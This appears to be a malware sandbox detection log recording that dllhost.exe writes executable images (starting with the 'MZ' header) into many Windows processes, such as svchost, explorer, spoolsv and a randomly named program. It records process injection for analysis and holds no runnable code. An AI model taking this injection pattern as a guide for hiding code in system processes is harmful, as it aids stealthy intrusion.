Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2C06F7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2917C380000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22382770000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 28A1B1D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A3EFFC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2C9AFB80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2C06F7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2917C380000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1486AD40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 28A1B1D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1486AD70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 24BD3CA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 24BD3CD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1FA73D30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1CD021B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 269B9FD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1FA73D30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1CD021B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 269BA660000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22054D80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22055340000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 27C57DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 27C57DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A333B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A333B70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1F174530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23315740000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A9C8540000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1EC212A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1F174530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1876D540000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23315740000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22CD8950000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A9C8540000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 15104330000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1EC212A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22308E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1876D540000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1AB19360000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22CD8950000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1E731800000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 15104330000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A6DD9B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22308E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1E2FA1C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1AB19360000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\spoolsv.exe base: D50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1E731800000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 209D2560000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1FC05190000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2AFD1A00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\spoolsv.exe base: D50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 209D2560000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D6B0FC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1FC05190000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2036E550000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2AFD1A00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 150FC5C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D6B0FC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2480FAC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2036E550000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2671A930000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2C588F90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2480FAC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A8857C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2671A930000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 174DEDC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2C588F90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 282A2110000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A8857C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1DA09D90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 174DEDC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 287FBEC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 282A2110000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\sihost.exe base: 2537C620000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1DA09D90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 29B59750000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 287FBEC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 20CAB590000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\sihost.exe base: 2537C620000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BBF95A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 29B59750000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D49EEE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 20CAB590000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ctfmon.exe base: 26E2B2E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BBF95A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B0CC6E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D49EEE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\explorer.exe base: 8260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ctfmon.exe base: 26E2B2E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23014DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B0CC6E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21744F70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\explorer.exe base: 8260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1F02ED50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23014DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dasHost.exe base: 1B2E6AF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21744F70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 25A84C20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 194A0710000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dasHost.exe base: 1B2E6AF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2AD4DDB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 25A84C20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 1C0F4C90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 194A0710000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1F3A50F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2AD4DDB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\smartscreen.exe base: 2164ACF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 19985DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1F3A50F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 23F7CDE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\smartscreen.exe base: 2164ACF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2EE94180000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 19985DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 23954370000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 23F7CDE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2EE94180000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 239543A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 292749D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1B9C9A20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 292749D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1B9C9CB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 29F0AD90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 29F0ADC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1C585A50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1C585A80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2BEA4190000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2BEA41C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 430000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 450000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1380000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 13A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: B00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: B20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: B60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: B60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1320000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 420000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 440000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1320000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1050000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1070000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 13D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 13F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1320000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 720000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 780000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: AD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: AF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: DC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: DE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: DF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 5C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 550000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: DE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: E00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 780000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 7A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1320000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1470000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1490000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: F70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: F90000 value starts with: 4D5A
